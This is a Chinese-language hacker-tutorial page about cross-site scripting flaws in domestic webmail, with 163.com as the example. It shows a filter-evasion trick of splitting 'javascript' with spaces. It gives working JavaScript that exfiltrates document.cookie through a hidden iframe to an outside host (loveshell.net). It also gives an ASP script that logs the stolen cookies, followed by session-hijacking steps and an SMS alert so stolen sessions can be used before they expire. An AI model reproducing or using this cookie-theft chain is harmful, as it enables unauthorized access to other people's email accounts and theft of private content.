首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 黑客教程

国内所有Mail安全漏洞


http://www.gipsky.com/
先简单说下<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=跨站脚本 target="_blank"><font color=red>跨站脚本</font></a></b><b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=漏洞 target="_blank"><font color=red>漏洞</font></a></b>,又称为XSS攻击,也称为Html代码注入<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=漏洞 target="_blank"><font color=red>漏洞</font></a></b>,可以知道<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=漏洞 target="_blank"><font color=red>漏洞</font></a></b>的起因是注入了Html代码,危害就是最终在别人浏览器内以浏览者的身份执行任意Html代码。

国内邮箱在<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=跨站脚本 target="_blank"><font color=red>跨站脚本</font></a></b>攻击防御方面存在<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=漏洞 target="_blank"><font color=red>漏洞</font></a></b>,可以被人引入script脚本,然后通过窃取cookie的手段来进入他人邮箱获得敏感内容。各个邮箱存在的问题可能不同,但是方法是一样的,现在就以163.com的邮箱作为例子。

163.com存在的问题在于对于script要害字过滤不正确,譬如<img src=(script removed)alert()>这样的代码在163中可能因为存在javascript而被转换,但是假如我们用jav ascrip t:alert()代码却可以躲避检查,但是后面的代码依然会执行。问题存在了,剩下的只是利用问题。

现在的服务器对浏览器的身份已经不是简单的Cookie了,一般采用的是session认证的方法。session是保存在服务器方面的,我们不能随意更改,但是我们可以劫持或者冒充,因为浏览器是通过提交一个sessionID之类的东西去服务器验证自己的身份的。譬如我们嗅叹或者其他的技术手段获得了一个治理员或者我们需要的用户的sessionID,就可以想办法自己取得这个sessionID去冒充他了。其实在<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=跨站脚本 target="_blank"><font color=red>跨站脚本</font></a></b>当中,sessionID等内容也是保存在cookie里的,假如我们偷到了Cookie也就取得了sessionID哦!

首先偷取Cookie,通过以下脚本引入一个js,document.write("<script src=XX.js></script>"),然后js内容为:



var code;

var target = "<a href="http://www.loveshell.net/cookie.asp?";" target=_blank>http://www.loveshell.net/cookie.asp?";</a>

info=escape(document.location "@@@" document.cookie);

target=target info;

code="<iframe style='display:none;' src=";

code=code target;

code=code " width=0 height=0></iframe>";

document.write(code);



这样就可以将cookie等信息传到我们的站点了!cookie.asp内容为:



dim fso,file,str

str=unescape(request.Servervariables("QUERY_STRING"))

Const ForReading = 1, ForWriting = 2, ForAppending = 8

Set fso = Server.CreateObject("Scripting.FileSystemObject")

path = server.mappath("loveshell.txt")

set file=fso.opentextfile(path, ForAppending, TRUE)

file.write("Xss:")

file.write(str)

file.write vbCrLf

file.close

set file = nothing

set fso = nothing



这样就可以将得到的Cookie保存了,因为在研究163的登陆机制之后需要当前登陆的服务器名,而这些在location里有所体现,主页面也可以通过 cookie推算出来,最后就是劫持这个Cookie了。随便找个能修改cookie的工具,譬如老兵的webtool就可以了,注重的是Url的构造,经过测试是可以成功登陆的,当然需要Cookie是不失效的,要求用户不要退出和时间不超过20分钟左右,这就需要cookie的有效性,如何实现这个呢?

用过<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=手机 target="_blank"><font color=red>手机</font></a></b>注册人知道,只要提交一个参数就会把一条信息发送到你的<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=手机 target="_blank"><font color=red>手机</font></a></b>上,为了确保时效性我们可以利用这个,做法就是修改Cookie.asp,一旦发现有某个特定信息提交就会向你的<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=手机 target="_blank"><font color=red>手机</font></a></b>发消息,然后我们可以迅速的在session失效之前进入邮箱,嘿嘿!
<< Dvbbs 7.1Sql版跳过死循环提权得Shell 清空代码防止查看源代码 >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号